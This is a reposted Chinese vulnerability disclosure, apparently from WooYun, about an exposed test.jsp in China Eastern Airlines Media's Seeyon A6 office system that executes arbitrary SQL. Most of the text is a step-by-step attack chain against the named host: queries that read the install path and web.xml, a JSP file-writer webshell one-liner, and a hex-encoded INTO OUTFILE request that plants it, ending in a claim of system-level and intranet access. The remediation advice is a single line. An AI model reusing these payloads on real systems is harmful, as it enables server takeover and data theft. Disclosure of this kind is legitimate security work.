东方航空传媒公司一个被忽略漏洞引发的血案(可getshell)
(window.slotbydup=window.slotbydup || []).push({
id: '2611110',
container: s,
size: '240,200',
display: 'inlay-fix'
您当前位置: &
[ 所属分类
| 时间 2016 |
作者 红领巾 ]
东方航空传媒公司一个被忽略漏洞引发的血案(可getshell)
中国东方航空股份有限公司
厂商已经确认
第三方程序漏洞
由之前被厂商忽略的一个漏洞引发的深入研究。
这算是无良厂商吗?
漏洞证明:
东方航空某系统seeyon致远A6系统任意sql语句执行,可分分钟getshell获取系统主机权限。
漏洞链接:http://cemftp./yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()
1、读取web根目录:http://cemftp./yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir
2、猜到web绝对路径:http://cemftp./yyoa/common/js/menu/test.jsp?doType=101&S1=select%20load_file(%27C:/Program%20Files/UFseeyon/OA/tomcat/webapps/yyoa/WEB-INF/web.xml%27)
3、利用 into outfile写shell:由于jsp一句话超长,请求连接会拒绝,故先上传写文件脚本,再本地构造进行webshell上传:
a、写文件脚本:
&%if(request.getParameter(&f&)!=null)(new java.io.FileOutputStream(application.getRealPath(&\\&)+request.getParameter(&f&))).write(request.getParameter(&t&).getBytes());%&
由于特殊符号存在,URL编码会造成写入后代码错误,故采用hex编码后unhex处理上传,写入文件名为:he1p.jsp
http://cemftp./yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273CE616DE756C6C6AF2EE2E6C5C6DE742E616DE%27)%20%20into%20outfile%20%27C:/Program%20Files/UFseeyon/OA/tomcat/webapps/yyoa/he1p.jsp%27
b、本地构造上传:
本地构造代码:
4、上传后获取webshell地址为:http://cemftp./yyoa/we1come.jsp
5、系统权限,域环境,可内网
作一个守法的,点到为止,不再深入。
修复方案:
目前无法确定test.jsp的作用,S1变量获取提交sql语句直接执行,难道是后门?
如果真没用,那就删掉test.jsp。
版权声明:转载请注明来源 s4cr00t@乌云
本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师
转载请注明本文标题:本站链接:
分享请点击:
1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
应将拖延当作你最可怕的仇敌,因为他要窃去你的时间,品格、能力、机会和自由,而使你成为他的奴隶-马尔顿
手机客户端
,专注代码审计及安全周边编程,转载请注明出处:http://www.codesec.net
转载文章如有侵权,请邮件 admin[at]codesec.net